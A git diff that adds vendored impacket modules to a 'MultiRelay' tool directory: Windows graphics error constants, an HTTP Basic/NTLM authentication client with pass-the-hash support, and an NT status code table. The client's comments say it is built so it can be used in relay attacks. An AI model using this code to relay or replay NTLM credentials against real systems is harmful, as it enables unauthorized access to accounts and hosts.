+ERROR_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED = 0xC0262348
+ERROR_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED = 0xC0262349
+ERROR_GRAPHICS_MODE_NOT_IN_MODESET = 0xC026234A
+ERROR_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON = 0xC026234D
+ERROR_GRAPHICS_INVALID_PATH_CONTENT_TYPE = 0xC026234E
+ERROR_GRAPHICS_INVALID_COPYPROTECTION_TYPE = 0xC026234F
+ERROR_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS = 0xC0262350
+ERROR_GRAPHICS_INVALID_SCANLINE_ORDERING = 0xC0262352
+ERROR_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED = 0xC0262353
+ERROR_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS = 0xC0262354
+ERROR_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT = 0xC0262355
+ERROR_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM = 0xC0262356
+ERROR_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED = 0xC0262400
+ERROR_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED = 0xC0262401
+ERROR_GRAPHICS_NOT_A_LINKED_ADAPTER = 0xC0262430
+ERROR_GRAPHICS_LEADLINK_NOT_ENUMERATED = 0xC0262431
+ERROR_GRAPHICS_CHAINLINKS_NOT_ENUMERATED = 0xC0262432
+ERROR_GRAPHICS_ADAPTER_CHAIN_NOT_READY = 0xC0262433
+ERROR_GRAPHICS_CHAINLINKS_NOT_STARTED = 0xC0262434
+ERROR_GRAPHICS_CHAINLINKS_NOT_POWERED_ON = 0xC0262435
+ERROR_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE = 0xC0262436
+ERROR_GRAPHICS_NOT_POST_DEVICE_DRIVER = 0xC0262438
+ERROR_GRAPHICS_OPM_NOT_SUPPORTED = 0xC0262500
+ERROR_GRAPHICS_COPP_NOT_SUPPORTED = 0xC0262501
+ERROR_GRAPHICS_UAB_NOT_SUPPORTED = 0xC0262502
+ERROR_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS = 0xC0262503
+ERROR_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL = 0xC0262504
+ERROR_GRAPHICS_OPM_NO_VIDEO_OUTPUTS_EXIST = 0xC0262505
+ERROR_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME = 0xC0262506
+ERROR_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP = 0xC0262507
+ERROR_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED = 0xC0262508
+ERROR_GRAPHICS_OPM_INVALID_POINTER = 0xC026250A
+ERROR_GRAPHICS_OPM_INTERNAL_ERROR = 0xC026250B
+ERROR_GRAPHICS_OPM_INVALID_HANDLE = 0xC026250C
+ERROR_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE = 0xC026250D
+ERROR_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH = 0xC026250E
+ERROR_GRAPHICS_OPM_SPANNING_MODE_ENABLED = 0xC026250F
+ERROR_GRAPHICS_OPM_THEATER_MODE_ENABLED = 0xC0262510
+ERROR_GRAPHICS_PVP_HFS_FAILED = 0xC0262511
+ERROR_GRAPHICS_OPM_INVALID_SRM = 0xC0262512
+ERROR_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP = 0xC0262513
+ERROR_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP = 0xC0262514
+ERROR_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA = 0xC0262515
+ERROR_GRAPHICS_OPM_HDCP_SRM_NEVER_SET = 0xC0262516
+ERROR_GRAPHICS_OPM_RESOLUTION_TOO_HIGH = 0xC0262517
+ERROR_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE = 0xC0262518
+ERROR_GRAPHICS_OPM_VIDEO_OUTPUT_NO_LONGER_EXISTS = 0xC0262519
+ERROR_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS = 0xC026251A
+ERROR_GRAPHICS_I2C_NOT_SUPPORTED = 0xC0262580
+ERROR_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST = 0xC0262581
+ERROR_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA = 0xC0262582
+ERROR_GRAPHICS_I2C_ERROR_RECEIVING_DATA = 0xC0262583
+ERROR_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED = 0xC0262584
+ERROR_GRAPHICS_DDCCI_INVALID_DATA = 0xC0262585
+ERROR_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE = 0xC0262586
+ERROR_GRAPHICS_MCA_INVALID_CAPABILITIES_STRING = 0xC0262587
+ERROR_GRAPHICS_MCA_INTERNAL_ERROR = 0xC0262588
+ERROR_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND = 0xC0262589
+ERROR_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH = 0xC026258A
+ERROR_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM = 0xC026258B
+ERROR_GRAPHICS_PMEA_INVALID_MONITOR = 0xC02625D6
+ERROR_GRAPHICS_PMEA_INVALID_D3D_DEVICE = 0xC02625D7
+ERROR_GRAPHICS_DDCCI_CURRENT_CURRENT_VALUE_GREATER_THAN_MAXIMUM_VALUE = 0xC02625D8
+ERROR_GRAPHICS_MCA_INVALID_VCP_VERSION = 0xC02625D9
+ERROR_GRAPHICS_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0xC02625DA
+ERROR_GRAPHICS_MCA_MCCS_VERSION_MISMATCH = 0xC02625DB
+ERROR_GRAPHICS_MCA_UNSUPPORTED_MCCS_VERSION = 0xC02625DC
+ERROR_GRAPHICS_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0xC02625DE
+ERROR_GRAPHICS_MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0xC02625DF
+ERROR_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED = 0xC02625E0
diff --git a/tools/MultiRelay/impacket-dev/impacket/http.py b/tools/MultiRelay/impacket-dev/impacket/http.py
new file mode 100644
index 0000000..800d001
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/http.py
@@ -0,0 +1,206 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+# Arseniy Sharoglazov / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+# For MS-RPCH
+# Can be programmed to be used in relay attacks
+#
+# Probably for future MAPI
+
+import re
+import ssl
+import base64
+import binascii
+
+try:
+ from http.client import HTTPConnection, HTTPSConnection
+except ImportError:
+ from httplib import HTTPConnection, HTTPSConnection
+
+from impacket import ntlm, LOG
+
+# Auth types
+AUTH_AUTO = 'Auto'
+AUTH_BASIC = 'Basic'
+AUTH_NTLM = 'NTLM'
+AUTH_NEGOTIATE = 'Negotiate'
+AUTH_BEARER = 'Bearer'
+AUTH_DIGEST = 'Digest'
+
+################################################################################
+# CLASSES
+################################################################################
+class HTTPClientSecurityProvider:
+ def __init__(self, auth_type=AUTH_AUTO):
+ self.__username = None
+ self.__password = None
+ self.__domain = None
+ self.__lmhash = ''
+ self.__nthash = ''
+ self.__aesKey = ''
+ self.__TGT = None
+ self.__TGS = None
+
+ self.__auth_type = auth_type
+
+ self.__auth_types = []
+ self.__ntlmssp_info = None
+
+ def set_auth_type(self, auth_type):
+ self.__auth_type = auth_type
+
+ def get_auth_type(self):
+ return self.__auth_type
+
+ def get_auth_types(self):
+ return self.__auth_types
+
+ def get_ntlmssp_info(self):
+ return self.__ntlmssp_info
+
+ def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+ self.__username = username
+ self.__password = password
+ self.__domain = domain
+
+ if lmhash != '' or nthash != '':
+ if len(lmhash) % 2:
+ lmhash = '0%s' % lmhash
+ if len(nthash) % 2:
+ nthash = '0%s' % nthash
+
+ try: # just in case they were converted already
+ self.__lmhash = binascii.unhexlify(lmhash)
+ self.__nthash = binascii.unhexlify(nthash)
+ except:
+ self.__lmhash = lmhash
+ self.__nthash = nthash
+ pass
+
+ self.__aesKey = aesKey
+ self.__TGT = TGT
+ self.__TGS = TGS
+
+ def parse_www_authenticate(self, header):
+ ret = []
+
+ if 'NTLM' in header:
+ ret.append(AUTH_NTLM)
+ if 'Basic' in header:
+ ret.append(AUTH_BASIC)
+ if 'Negotiate' in header:
+ ret.append(AUTH_NEGOTIATE)
+ if 'Bearer' in header:
+ ret.append(AUTH_BEARER)
+ if 'Digest' in header:
+ ret.append(AUTH_DIGEST)
+
+ return ret
+
+ def connect(self, protocol, host_L6):
+ if protocol == 'http':
+ return HTTPConnection(host_L6)
+ else:
+ try:
+ uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+ return HTTPSConnection(host_L6, context=uv_context)
+ except AttributeError:
+ return HTTPSConnection(host_L6)
+
+ def get_auth_headers(self, http_obj, method, path, headers):
+ if self.__auth_type == AUTH_BASIC:
+ return self.get_auth_headers_basic(http_obj, method, path, headers)
+ elif self.__auth_type in [AUTH_AUTO, AUTH_NTLM]:
+ return self.get_auth_headers_auto(http_obj, method, path, headers)
+ else:
+ raise Exception('%s auth type not supported' % self.__auth_type)
+
+ def get_auth_headers_basic(self, http_obj, method, path, headers):
+ if self.__lmhash != '' or self.__nthash != '' or \
+ self.__aesKey != '' or self.__TGT != None or self.__TGS != None:
+ raise Exception('Basic authentication in HTTP connection used, '
+ 'so set a plaintext credentials to connect.')
+
+ if self.__domain == '':
+ auth_line = self.__username + ':' + self.__password
+ else:
+ auth_line = self.__domain + '\\' + self.__username + ':' + self.__password
+
+ auth_line_http = 'Basic %s' % base64.b64encode(auth_line.encode('UTF-8')).decode('ascii')
+
+ # Format: auth_headers, reserved, ...
+ return {'Authorization': auth_line_http}, None
+
+ # It's important that the class contains the separate method that
+ # gets NTLM Type 1 value, as this way the class can be programmed to
+ # be used in relay attacks
+ def send_ntlm_type1(self, http_obj, method, path, headers, negotiateMessage):
+ auth_headers = headers.copy()
+ auth_headers['Content-Length'] = '0'
+ auth_headers['Authorization'] = 'NTLM %s' % base64.b64encode(negotiateMessage).decode('ascii')
+ http_obj.request(method, path, headers=auth_headers)
+ res = http_obj.getresponse()
+ res.read()
+
+ if res.status != 401:
+ raise Exception('Status code returned: %d. '
+ 'Authentication does not seem required for url %s'
+ % (res.status, path)
+ )
+
+ if res.getheader('WWW-Authenticate') is None:
+ raise Exception('No authentication requested by '
+ 'the server for url %s' % path)
+
+ if self.__auth_types == []:
+ self.__auth_types = self.parse_www_authenticate(res.getheader('WWW-Authenticate'))
+
+ if AUTH_NTLM not in self.__auth_types:
+ # NTLM auth not supported for url
+ return None, None
+
+ try:
+ serverChallengeBase64 = re.search('NTLM ([a-zA-Z0-9+/]+={0,2})',
+ res.getheader('WWW-Authenticate')).group(1)
+ serverChallenge = base64.b64decode(serverChallengeBase64)
+ except (IndexError, KeyError, AttributeError):
+ raise Exception('No NTLM challenge returned from server for url %s' % path)
+
+ if not self.__ntlmssp_info:
+ challenge = ntlm.NTLMAuthChallenge(serverChallenge)
+ self.__ntlmssp_info = ntlm.AV_PAIRS(challenge['TargetInfoFields'])
+
+ # Format: serverChallenge, reserved, ...
+ return serverChallenge, None
+
+ def get_auth_headers_auto(self, http_obj, method, path, headers):
+ if self.__aesKey != '' or self.__TGT != None or self.__TGS != None:
+ raise Exception('NTLM authentication in HTTP connection used, ' \
+ 'cannot use Kerberos.')
+
+ auth = ntlm.getNTLMSSPType1(domain=self.__domain)
+ serverChallenge = self.send_ntlm_type1(http_obj, method, path, headers, auth.getData())[0]
+
+ if serverChallenge is not None:
+ self.__auth_type = AUTH_NTLM
+
+ type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, serverChallenge, self.__username,
+ self.__password, self.__domain,
+ self.__lmhash, self.__nthash)
+
+ auth_line_http = 'NTLM %s' % base64.b64encode(type3.getData()).decode('ascii')
+ else:
+ if self.__auth_type == AUTH_AUTO and AUTH_BASIC in self.__auth_types:
+ self.__auth_type = AUTH_BASIC
+ return self.get_auth_headers_basic(http_obj, method, path, headers)
+ else:
+ raise Exception('No supported auth offered by URL: %s' % self.__auth_types)
+
+ # Format: auth_headers, reserved, ...
+ return {'Authorization': auth_line_http}, None
diff --git a/tools/MultiRelay/impacket-dev/impacket/nt_errors.py b/tools/MultiRelay/impacket-dev/impacket/nt_errors.py
new file mode 100644
index 0000000..7266c83
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/nt_errors.py
@@ -0,0 +1,3604 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# NT STATUS Errors from [MS-ERREF]. Ideally all the files
+# should grab the error codes from here (big ToDo)
+#
+
+ERROR_MESSAGES = {
+ 0x00000000: ("STATUS_SUCCESS","The operation completed successfully."),
+ 0x00000001: ("STATUS_WAIT_1","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."),
+ 0x00000002: ("STATUS_WAIT_2","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."),
+ 0x00000003: ("STATUS_WAIT_3","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."),
+ 0x0000003F: ("STATUS_WAIT_63","The caller specified WaitAny for WaitType and one of the dispatcher objects in the Object array has been set to the signaled state."),
+ 0x00000080: ("STATUS_ABANDONED","The caller attempted to wait for a mutex that has been abandoned."),
+ 0x00000080: ("STATUS_ABANDONED_WAIT_0","The caller attempted to wait for a mutex that has been abandoned."),
+ 0x000000BF: ("STATUS_ABANDONED_WAIT_63","The caller attempted to wait for a mutex that has been abandoned."),
+ 0x000000C0: ("STATUS_USER_APC","A user-mode APC was delivered before the given Interval expired."),
+ 0x00000101: ("STATUS_ALERTED","The delay completed because the thread was alerted."),
+ 0x00000102: ("STATUS_TIMEOUT","The given Timeout interval expired."),
+ 0x00000103: ("STATUS_PENDING","The operation that was requested is pending completion."),
+ 0x00000104: ("STATUS_REPARSE","A reparse should be performed by the Object Manager because the name of the file resulted in a symbolic link."),
+ 0x00000105: ("STATUS_MORE_ENTRIES","Returned by enumeration APIs to indicate more information is available to successive calls."),
+ 0x00000106: ("STATUS_NOT_ALL_ASSIGNED","Indicates not all privileges or groups that are referenced are assigned to the caller. This allows, for example, all privileges to be disabled without having to know exactly which privileges are assigned."),
+ 0x00000107: ("STATUS_SOME_NOT_MAPPED","Some of the information to be translated has not been translated."),
+ 0x00000108: ("STATUS_OPLOCK_BREAK_IN_PROGRESS","An open/create operation completed while an opportunistic lock (oplock) break is underway."),
+ 0x00000109: ("STATUS_VOLUME_MOUNTED","A new volume has been mounted by a file system."),
+ 0x0000010A: ("STATUS_RXACT_COMMITTED","This success level status indicates that the transaction state already exists for the registry subtree but that a transaction commit was previously aborted. The commit has now been completed."),
+ 0x0000010B: ("STATUS_NOTIFY_CLEANUP","Indicates that a notify change request has been completed due to closing the handle that made the notify change request."),
+ 0x0000010C: ("STATUS_NOTIFY_ENUM_DIR","Indicates that a notify change request is being completed and that the information is not being returned in the caller's buffer. The caller now needs to enumerate the files to find the changes."),
+ 0x0000010D: ("STATUS_NO_QUOTAS_FOR_ACCOUNT","{No Quotas} No system quota limits are specifically set for this account."),
+ 0x0000010E: ("STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED","{Connect Failure on Primary Transport} An attempt was made to connect to the remote server %hs on the primary transport, but the connection failed. The computer WAS able to connect on a secondary transport."),
+ 0x00000110: ("STATUS_PAGE_FAULT_TRANSITION","The page fault was a transition fault."),
+ 0x00000111: ("STATUS_PAGE_FAULT_DEMAND_ZERO","The page fault was a demand zero fault."),
+ 0x00000112: ("STATUS_PAGE_FAULT_COPY_ON_WRITE","The page fault was a demand zero fault."),
+ 0x00000113: ("STATUS_PAGE_FAULT_GUARD_PAGE","The page fault was a demand zero fault."),
+ 0x00000114: ("STATUS_PAGE_FAULT_PAGING_FILE","The page fault was satisfied by reading from a secondary storage device."),
+ 0x00000115: ("STATUS_CACHE_PAGE_LOCKED","The cached page was locked during operation."),
+ 0x00000116: ("STATUS_CRASH_DUMP","The crash dump exists in a paging file."),
+ 0x00000117: ("STATUS_BUFFER_ALL_ZEROS","The specified buffer contains all zeros."),
+ 0x00000118: ("STATUS_REPARSE_OBJECT","A reparse should be performed by the Object Manager because the name of the file resulted in a symbolic link."),
+ 0x00000119: ("STATUS_RESOURCE_REQUIREMENTS_CHANGED","The device has succeeded a query-stop and its resource requirements have changed."),
+ 0x00000120: ("STATUS_TRANSLATION_COMPLETE","The translator has translated these resources into the global space and no additional translations should be performed."),
+ 0x00000121: ("STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY","The directory service evaluated group memberships locally, because it was unable to contact a global catalog server."),
+ 0x00000122: ("STATUS_NOTHING_TO_TERMINATE","A process being terminated has no threads to terminate."),
+ 0x00000123: ("STATUS_PROCESS_NOT_IN_JOB","The specified process is not part of a job."),
+ 0x00000124: ("STATUS_PROCESS_IN_JOB","The specified process is part of a job."),
+ 0x00000125: ("STATUS_VOLSNAP_HIBERNATE_READY","{Volume Shadow Copy Service} The system is now ready for hibernation."),
+ 0x00000126: ("STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY","A file system or file system filter driver has successfully completed an FsFilter operation."),
+ 0x00000127: ("STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED","The specified interrupt vector was already connected."),
+ 0x00000128: ("STATUS_INTERRUPT_STILL_CONNECTED","The specified interrupt vector is still connected."),
+ 0x00000129: ("STATUS_PROCESS_CLONED","The current process is a cloned process."),
+ 0x0000012A: ("STATUS_FILE_LOCKED_WITH_ONLY_READERS","The file was locked and all users of the file can only read."),
+ 0x0000012B: ("STATUS_FILE_LOCKED_WITH_WRITERS","The file was locked and at least one user of the file can write."),
+ 0x00000202: ("STATUS_RESOURCEMANAGER_READ_ONLY","The specified ResourceManager made no changes or updates to the resource under this transaction."),
+ 0x00000367: ("STATUS_WAIT_FOR_OPLOCK","An operation is blocked and waiting for an oplock."),
+ 0x00010001: ("DBG_EXCEPTION_HANDLED","Debugger handled the exception."),
+ 0x00010002: ("DBG_CONTINUE","The debugger continued."),
+ 0x001C0001: ("STATUS_FLT_IO_COMPLETE","The IO was completed by a filter."),
+ 0xC0000467: ("STATUS_FILE_NOT_AVAILABLE","The file is temporarily unavailable."),
+ 0xC0000721: ("STATUS_CALLBACK_RETURNED_THREAD_AFFINITY","A threadpool worker thread entered a callback at thread affinity %p and exited at affinity %p. This is unexpected, indicating that the callback missed restoring the priority."),
+ 0x40000000: ("STATUS_OBJECT_NAME_EXISTS","{Object Exists} An attempt was made to create an object but the object name already exists."),
+ 0x40000001: ("STATUS_THREAD_WAS_SUSPENDED","{Thread Suspended} A thread termination occurred while the thread was suspended. The thread resumed, and termination proceeded."),
+ 0x40000002: ("STATUS_WORKING_SET_LIMIT_RANGE","{Working Set Range Error} An attempt was made to set the working set minimum or maximum to values that are outside the allowable range."),
+ 0x40000003: ("STATUS_IMAGE_NOT_AT_BASE","{Image Relocated} An image file could not be mapped at the address that is specified in the image file. Local fixes must be performed on this image."),
+ 0x40000004: ("STATUS_RXACT_STATE_CREATED","This informational level status indicates that a specified registry subtree transaction state did not yet exist and had to be created."),
+ 0x40000005: ("STATUS_SEGMENT_NOTIFICATION","{Segment Load} A virtual DOS machine (VDM) is loading, unloading, or moving an MS-DOS or Win16 program segment image. An exception is raised so that a debugger can load, unload, or track symbols and breakpoints within these 16-bit segments."),
+ 0x40000006: ("STATUS_LOCAL_USER_SESSION_KEY","{Local Session Key} A user session key was requested for a local remote procedure call (RPC) connection. The session key that is returned is a constant value and not unique to this connection."),
+ 0x40000007: ("STATUS_BAD_CURRENT_DIRECTORY","{Invalid Current Directory} The process cannot switch to the startup current directory %hs. Select OK to set the current directory to %hs, or select CANCEL to exit."),
+ 0x40000008: ("STATUS_SERIAL_MORE_WRITES","{Serial IOCTL Complete} A serial I/O operation was completed by another write to a serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)"),
+ 0x40000009: ("STATUS_REGISTRY_RECOVERED","{Registry Recovery} One of the files that contains the system registry data had to be recovered by using a log or alternate copy. The recovery was successful."),
+ 0x4000000A: ("STATUS_FT_READ_RECOVERY_FROM_BACKUP","{Redundant Read} To satisfy a read request, the Windows NT fault-tolerant file system successfully read the requested data from a redundant copy. This was done because the file system encountered a failure on a member of the fault-tolerant volume but was unable to reassign the failing area of the device."),
+ 0x4000000B: ("STATUS_FT_WRITE_RECOVERY","{Redundant Write} To satisfy a write request, the Windows NT fault-tolerant file system successfully wrote a redundant copy of the information. This was done because the file system encountered a failure on a member of the fault-tolerant volume but was unable to reassign the failing area of the device."),
+ 0x4000000C: ("STATUS_SERIAL_COUNTER_TIMEOUT","{Serial IOCTL Timeout} A serial I/O operation completed because the time-out period expired. (The IOCTL_SERIAL_XOFF_COUNTER had not reached zero.)"),
+ 0x4000000D: ("STATUS_NULL_LM_PASSWORD","{Password Too Complex} The Windows password is too complex to be converted to a LAN Manager password. The LAN Manager password that returned is a NULL string."),
+ 0x4000000E: ("STATUS_IMAGE_MACHINE_TYPE_MISMATCH","{Machine Type Mismatch} The image file %hs is valid but is for a machine type other than the current machine. Select OK to continue, or CANCEL to fail the DLL load."),
+ 0x4000000F: ("STATUS_RECEIVE_PARTIAL","{Partial Data Received} The network transport returned partial data to its client. The remaining data will be sent later."),
+ 0x40000010: ("STATUS_RECEIVE_EXPEDITED","{Expedited Data Received} The network transport returned data to its client that was marked as expedited by the remote system."),
+ 0x40000011: ("STATUS_RECEIVE_PARTIAL_EXPEDITED","{Partial Expedited Data Received} The network transport returned partial data to its client and this data was marked as expedited by the remote system. The remaining data will be sent later."),
+ 0x40000012: ("STATUS_EVENT_DONE","{TDI Event Done} The TDI indication has completed successfully."),
+ 0x40000013: ("STATUS_EVENT_PENDING","{TDI Event Pending} The TDI indication has entered the pending state."),
+ 0x40000014: ("STATUS_CHECKING_FILE_SYSTEM","Checking file system on %wZ."),
+ 0x40000015: ("STATUS_FATAL_APP_EXIT","{Fatal Application Exit} %hs"),
+ 0x40000016: ("STATUS_PREDEFINED_HANDLE","The specified registry key is referenced by a predefined handle."),
+ 0x40000017: ("STATUS_WAS_UNLOCKED","{Page Unlocked} The page protection of a locked page was changed to 'No Access' and the page was unlocked from memory and from the process."),
+ 0x40000018: ("STATUS_SERVICE_NOTIFICATION","%hs"),
+ 0x40000019: ("STATUS_WAS_LOCKED","{Page Locked} One of the pages to lock was already locked."),
+ 0x4000001A: ("STATUS_LOG_HARD_ERROR","Application popup: %1 : %2"),
+ 0x4000001B: ("STATUS_ALREADY_WIN32","A Win32 process already exists."),
+ 0x4000001C: ("STATUS_WX86_UNSIMULATE","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x4000001D: ("STATUS_WX86_CONTINUE","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x4000001E: ("STATUS_WX86_SINGLE_STEP","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x4000001F: ("STATUS_WX86_BREAKPOINT","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x40000020: ("STATUS_WX86_EXCEPTION_CONTINUE","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x40000021: ("STATUS_WX86_EXCEPTION_LASTCHANCE","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x40000022: ("STATUS_WX86_EXCEPTION_CHAIN","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x40000023: ("STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE","{Machine Type Mismatch} The image file %hs is valid but is for a machine type other than the current machine."),
+ 0x40000024: ("STATUS_NO_YIELD_PERFORMED","A yield execution was performed and no thread was available to run."),
+ 0x40000025: ("STATUS_TIMER_RESUME_IGNORED","The resume flag to a timer API was ignored."),
+ 0x40000026: ("STATUS_ARBITRATION_UNHANDLED","The arbiter has deferred arbitration of these resources to its parent."),
+ 0x40000027: ("STATUS_CARDBUS_NOT_SUPPORTED","The device has detected a CardBus card in its slot."),
+ 0x40000028: ("STATUS_WX86_CREATEWX86TIB","An exception status code that is used by the Win32 x86 emulation subsystem."),
+ 0x40000029: ("STATUS_MP_PROCESSOR_MISMATCH","The CPUs in this multiprocessor system are not all the same revision level. To use all processors, the operating system restricts itself to the features of the least capable processor in the system. If problems occur with this system, contact the CPU manufacturer to see if this mix of processors is supported."),
+ 0x4000002A: ("STATUS_HIBERNATED","The system was put into hibernation."),
+ 0x4000002B: ("STATUS_RESUME_HIBERNATION","The system was resumed from hibernation."),
+ 0x4000002C: ("STATUS_FIRMWARE_UPDATED","Windows has detected that the system firmware (BIOS) was updated [previous firmware date = %2, current firmware date %3]."),
+ 0x4000002D: ("STATUS_DRIVERS_LEAKING_LOCKED_PAGES","A device driver is leaking locked I/O pages and is causing system degradation. The system has automatically enabled the tracking code to try and catch the culprit."),
+ 0x4000002E: ("STATUS_MESSAGE_RETRIEVED","The ALPC message being canceled has already been retrieved from the queue on the other side."),
+ 0x4000002F: ("STATUS_SYSTEM_POWERSTATE_TRANSITION","The system power state is transitioning from %2 to %3."),
+ 0x40000030: ("STATUS_ALPC_CHECK_COMPLETION_LIST","The receive operation was successful. Check the ALPC completion list for the received message."),
+ 0x40000031: ("STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION","The system power state is transitioning from %2 to %3 but could enter %4."),
+ 0x40000032: ("STATUS_ACCESS_AUDIT_BY_POLICY","Access to %1 is monitored by policy rule %2."),
+ 0x40000033: ("STATUS_ABANDON_HIBERFILE","A valid hibernation file has been invalidated and should be abandoned."),
+ 0x40000034: ("STATUS_BIZRULES_NOT_ENABLED","Business rule scripts are disabled for the calling application."),
+ 0x40000294: ("STATUS_WAKE_SYSTEM","The system has awoken."),
+ 0x40000370: ("STATUS_DS_SHUTTING_DOWN","The directory service is shutting down."),
+ 0x40010001: ("DBG_REPLY_LATER","Debugger will reply later."),
+ 0x40010002: ("DBG_UNABLE_TO_PROVIDE_HANDLE","Debugger cannot provide a handle."),
+ 0x40010003: ("DBG_TERMINATE_THREAD","Debugger terminated the thread."),
+ 0x40010004: ("DBG_TERMINATE_PROCESS","Debugger terminated the process."),
+ 0x40010005: ("DBG_CONTROL_C","Debugger obtained control of C."),
+ 0x40010006: ("DBG_PRINTEXCEPTION_C","Debugger printed an exception on control C."),
+ 0x40010007: ("DBG_RIPEXCEPTION","Debugger received a RIP exception."),
+ 0x40010008: ("DBG_CONTROL_BREAK","Debugger received a control break."),
+ 0x40010009: ("DBG_COMMAND_EXCEPTION","Debugger command communication exception."),
+ 0x40020056: ("RPC_NT_UUID_LOCAL_ONLY","A UUID that is valid only on this computer has been allocated."),
+ 0x400200AF: ("RPC_NT_SEND_INCOMPLETE","Some data remains to be sent in the request buffer."),
+ 0x400A0004: ("STATUS_CTX_CDM_CONNECT","The Client Drive Mapping Service has connected on Terminal Connection."),
+ 0x400A0005: ("STATUS_CTX_CDM_DISCONNECT","The Client Drive Mapping Service has disconnected on Terminal Connection."),
+ 0x4015000D: ("STATUS_SXS_RELEASE_ACTIVATION_CONTEXT","A kernel mode component is releasing a reference on an activation context."),
+ 0x40190034: ("STATUS_RECOVERY_NOT_NEEDED","The transactional resource manager is already consistent. Recovery is not needed."),
+ 0x40190035: ("STATUS_RM_ALREADY_STARTED","The transactional resource manager has already been started."),
+ 0x401A000C: ("STATUS_LOG_NO_RESTART","The log service encountered a log stream with no restart area."),
+ 0x401B00EC: ("STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST","{Display Driver Recovered From Failure} The %hs display driver has detected a failure and recovered from it. Some graphical operations may have failed. The next time you restart the machine, a dialog box appears, giving you an opportunity to upload data about this failure to Microsoft."),
+ 0x401E000A: ("STATUS_GRAPHICS_PARTIAL_DATA_POPULATED","The specified buffer is not big enough to contain the entire requested dataset. Partial data is populated up to the size of the buffer. The caller needs to provide a buffer of the size as specified in the partially populated buffer's content (interface specific)."),
+ 0x401E0117: ("STATUS_GRAPHICS_DRIVER_MISMATCH","The kernel driver detected a version mismatch between it and the user mode driver."),
+ 0x401E0307: ("STATUS_GRAPHICS_MODE_NOT_PINNED","No mode is pinned on the specified VidPN source/target."),
+ 0x401E031E: ("STATUS_GRAPHICS_NO_PREFERRED_MODE","The specified mode set does not specify a preference for one of its modes."),
+ 0x401E034B: ("STATUS_GRAPHICS_DATASET_IS_EMPTY","The specified dataset (for example, mode set, frequency range set, descriptor set, or topology) is empty."),
+ 0x401E034C: ("STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET","The specified dataset (for example, mode set, frequency range set, descriptor set, or topology) does not contain any more elements."),
+ 0x401E0351: ("STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED","The specified content transformation is not pinned on the specified VidPN present path."),
+ 0x401E042F: ("STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS","The child device presence was not reliably detected."),
